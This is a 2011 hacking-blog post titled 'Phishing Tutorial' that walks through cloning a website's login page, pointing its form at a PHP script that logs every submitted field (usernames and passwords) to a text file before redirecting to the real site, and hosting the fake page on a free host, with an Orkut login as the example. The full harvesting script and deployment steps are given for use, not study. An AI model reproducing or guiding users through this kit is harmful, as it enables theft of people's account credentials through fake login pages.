HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA

Tuesday, 5 July 2011

Phishing Tutorial

Ok so first:



1- Go take the source of the website you want to phish.



2-When you got it, create on your desktop a file named index.txt

in that one, you will paste the source.



3- verify that all the images and other files like javascript and css are linked to the originale website. so if the website is


CODE
http://www.website.com/file.html
, copy
CODE
http://www.website.com/

before all other files that you find. so if an image is image/poo.gif, it should be



4- after all that is done, change the .txt extension to .htm or .html
and verify the website looks the same. if it doesnt, it is maybe
because the css contains images. then you would need to download the
css, and make the same process as 3rd step.



Not that if you upload the new css on ur host, you dont need to put the
real host in front of it. if it is in the same path as index.html, you
can let is as stylesheet.css or whatever it is




5-make a file named post.txt and add the following content in it:


PHP Code:
CODE

header ('Location: [url="http://THE"]http://THE[/url] ORIGINAL WEBSITE HERE ');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


change the extension .txt to .php. after that, you need to
gochange the place where the html file send the information. so open
your index.html with notepad and search action=. after u found it,
change the content in the " " to post.php.



6-now simply create file name log.txt where alll password of phished material will come




Now U Need A Host i prefer by way freehostia.com

How To Register and Upload Their



1 First Goto This url
CODE
http://freehostia.com/signup.html


And Register for a free account their.In The Domain Name Select Use a subdomain.

2 Login To Your Cpanel And select Site Management

Reduced: 50% of original size [ 1018 x 239 ] - Click to view full image
 

 


3 Now Select File Manage

Reduced: 50% of original size [ 1015 x 283 ] - Click to view full ima

Reduced: 68% of original size [ 748 x 382 ] - Click to view full image

 


5 Select browse And Uplaod all The Files

Reduced: 73% of original size [ 696 x 329 ] - Click to view full image
 
6 I Have taken Example Of Orkut Fake Login Page


get The Url Of the .html Page

like This (Your Domain name).freehostia.com/orkut.html

Reduced: 72% of original size [ 709 x 332 ] - Click to view full image
 
 7 A new .TXT file will appear in the Directory were u have Uploaded all the files Cointaing
The login imformation

Reduced: 74% of original size [ 683 x 367 ] - Click to view full image
 
 


  7 Now Check the Box near Logins and select permission 700 and click change

Reduced: 72% of original size [ 707 x 334 ] - Click to view full image
Thats All Happy Hacking

Self Made Tutorial Say Thanks If u Like It.....................
 

0 comments:

Post a Comment

 
Design by HACKERS UNDERGROUND
HACKERS UNDERGROUND © 2012 BY RISHABH SHARMA